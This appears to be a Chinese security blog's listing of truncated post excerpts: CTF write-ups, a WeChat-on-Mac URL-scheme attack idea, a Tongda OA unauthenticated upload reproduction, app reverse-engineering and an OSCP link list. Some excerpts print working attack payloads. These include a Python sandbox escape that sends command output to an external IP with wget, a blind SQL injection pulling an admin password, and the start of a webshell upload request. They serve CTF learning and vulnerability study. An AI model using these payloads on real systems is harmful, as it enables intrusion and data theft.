MAC下微信浏览器可能可行的利用方式在MAC下的微信浏览器,与其他浏览器不同,通过在笔记中添加协议,在用户点击后会自动执行url scheme协议,用户无需确认即可执行。
下面列出几种可行的攻击方案,但是还没有找到一种比较完美的:
1、通过file协议可直接执行app文件,但是前提是需要文件落地,所以需要预先将文件传输,但是如果通过http等方式下载文件运行app是会触发到mac的Gatekeep机制导致无法直接运行、而在MAC OS10.15版本后通过smb等方式传输的文件会存在LSOpenURLsWithRole() failed with error -10810错误导致无法运行,...
WEBBaby Calc1234通过测试发现该环境为python3沙盒逃逸通过网上公开的POC发现存在代码执行,但是无法回显尝试反弹SHELL均失败发现系统不存在curl命令,但存在wget通过wget命令携带回显带出到vps
如下图使用wget,把命令包含在``中在使用base64带到vps中
1POC:expr=__import__("os").__getattribute__("metsys"[::-1])("wget%20http://49.234.223.23:1234/1.txt?data=`cat%20/flag_is_h...
卫生健康行业CTFwebeasy_cms下载源码本地搭建环境,最下方cms名字叫闪灵搜索相关cms漏洞,发现前台存在一个sql延迟注入,构造poc1/**/AND/**/(if(ascii(substr((select/**/A_pwd/**/from/**/SL_admin/**/limit/**/0,1),1,1))<>50,1,sleep(3)))=xxx编写python脚本
12345678910111213141516171819202122232425262728#coding:utf-8#Author:Ca1s1import requestsimport tim...
tinypng题目提供了源代码,通过php artisan 命令,可以看到是Laravel 8.15框架 首先查看路由信息
先查看一下fileupload路由,可以发现文件上传时对内容进行了过滤,且只允许上传png
接着我们看image路由,进入ImageController,$source可控接着判断是否为png结尾,如果为png结尾则传给imgcompress类。 进入imgcompress类,$this->src为我们传入的$source 接着又传递给compressImg类,调用了openImg方法
将$source传递给了getimagesize,getimages...
漏洞复现影响版本:123456V11版2017版2016版2015版2013版2013增强版
测试环境:111.2.191129
漏洞复现:通过 /ispirit/im/upload.php 页面,未授权文件上传一个一句话文件,可获得路径和文件名。
12345678910111213141516171819202122232425262728293031323334353637POST /ispirit/im/upload.php HTTP/1.1Host: 192.168.235.7Content-Length: 656Cache-Control: no-cacheUser-Ag...
JEB 动态调试 加密工具JEB3
BurpSuite
Genymotion
操作先准备一个模拟器或安卓手机,配置好BurpSuite代理,可以抓取到如下数据包,Request和Response都已加密。
用Jeb3打开Apk,进入Bytecode菜单,点击下方的字符串,搜索dataStr双击进入。(为啥要搜索它? 因为它在提交数据中是个协议头, 添加这些参数的时候想必都会在一个代码块, 所以加密函数也可能在附近。)
进入后我们可以看到smali代码,在可疑的地方通过Ctrl+b可以下断点进行调试。
模拟器内需要先打开APP,然后点击上方虫子按钮,可以看到如下图所示,点击附上。
注...
首届“神盾杯”上海市网络安全竞赛,去年的比赛。
0x00 babyJS操作内容:
查看源码 找不到被调用的CheckLogin函数
看到script中有用到unespace和escape等函数 用于编码字符串
将eval传参改为alert 显示为弹窗
发现check函数 并将flag与用户输入做比较 得到flag
FLAG值:
flag{a5a5f402f6dc62acd3e848900a17513f}
0x01 crypto_easy_1操作内容:
下载文件
发现3行类似的数据 并且长度一致。
:左边的长度为42 右边的长度为56 ,猜测右边被base64编码过 进行解码 比较...
burp 爆破 JS加密首先右键登录按钮属性查看html源代码,发现id=’rsa’
ctrl+shift+f 查找rsa描点,发现调用了strEnr
继续查找strEnr,并进入函数
对加密函数添加断点进行判断,发现123123账号密码进入了此处,且3个key分别为1,2,3。
我们直接控制台调用,尝试加密解密
保存des.js到本地
既然找到了加密解密函数现在就是通过burp调用函数使其加解密,修改phantomjs_server.js
载入server.js
burp连接server端口,test,我们现在已经可以成功加密了
配置burp intruder,添加变...
OSCP备忘录
参考链接
https://github.com/xuanhusec/OscpStudyGroup
https://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/
https://github.com/RustyShackleford221/OSCP-Prep
http://www.securityidiots.com/Web-Pentest
考试指南:
https://www.lshack.cn/wp-content/uploads/2019/02/lshack.cn_2019-02-12_09-30-31...